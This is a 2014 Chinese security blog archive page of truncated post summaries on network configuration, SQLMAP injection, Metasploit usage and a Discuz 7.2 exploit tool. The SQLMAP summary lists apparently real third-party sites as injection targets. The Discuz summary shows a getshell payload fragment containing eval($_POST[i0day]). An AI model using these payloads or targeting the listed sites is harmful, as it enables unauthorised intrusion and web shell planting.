2014年7月10日
摘要:
第一种:使用命令修改(直接即时生效,重启失效) #ifconfig eth0 192.168.0.1 netmask 255.255.255.0 up 说明: eth0是第一个网卡,其他依次为eth1,eth* 192.168.0.1是给网卡配置的第一个网卡配置的ip地址 netmask 255.2... 阅读全文
2014年7月10日
2014年7月9日
摘要:
1.SQLMAP安装及access注入:http://www.stronkin.com/en/CompHonorBig.asp?id=72.Mysql数据库注入http://www.slibrary.com/link.php?id=3213.Cookie注入:http://www.ntjx.org/... 阅读全文
2014年7月8日
摘要:
关于脚本安全这个话题好像永远没完没了,如果你经常到国外的各种各样的bugtraq上,你会发现有一半以上都和脚本相关,诸如SQL injection,XSS,Path Disclosure,Remote commands execution这样的字眼比比皆是,我们看了之后的用途难道仅仅是抓肉鸡?对于我... 阅读全文
2014年7月7日
摘要:
阅读全文
摘要:
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性。以实践为导向,既详细讲解了Metasploit渗透测试的技术、流程、方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想。本书是Metasploit渗透测试领域难得的经典佳作... 阅读全文
摘要:
阅读全文
摘要:
一、msfconsole? 帮助菜单back 从当前环境返回banner 显示一个MSF bannercd 切换目录color 颜色转换connect 连接一个主机exit 退出MSFhelp 帮助菜单info 显示一个或多个模块的信息irb 进入irb脚本模式jobs 显示和管理作业kill 杀死... 阅读全文
摘要:
msf的强大之处也就不做探讨了,虽然这些东西网上很多。但我想说说我的感受。这次的演示是在BT5中远程攻击一台win2003 sp2 metasploit是4.3的需要说明的一点是 现在的BT5中不像BT4中有postgresql数据库 需要使用的须自行安装。并且现在msf在4.0以后就没有了db_a... 阅读全文
摘要:
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估, 提供真正的安全风险情报。这些功能包括智能开发,密码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发 现。Met... 阅读全文
2014年7月6日
摘要:
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。下载地址:DZ7.2附代码:bbs.49you.com\');eval($_POST[i0day]);/... 阅读全文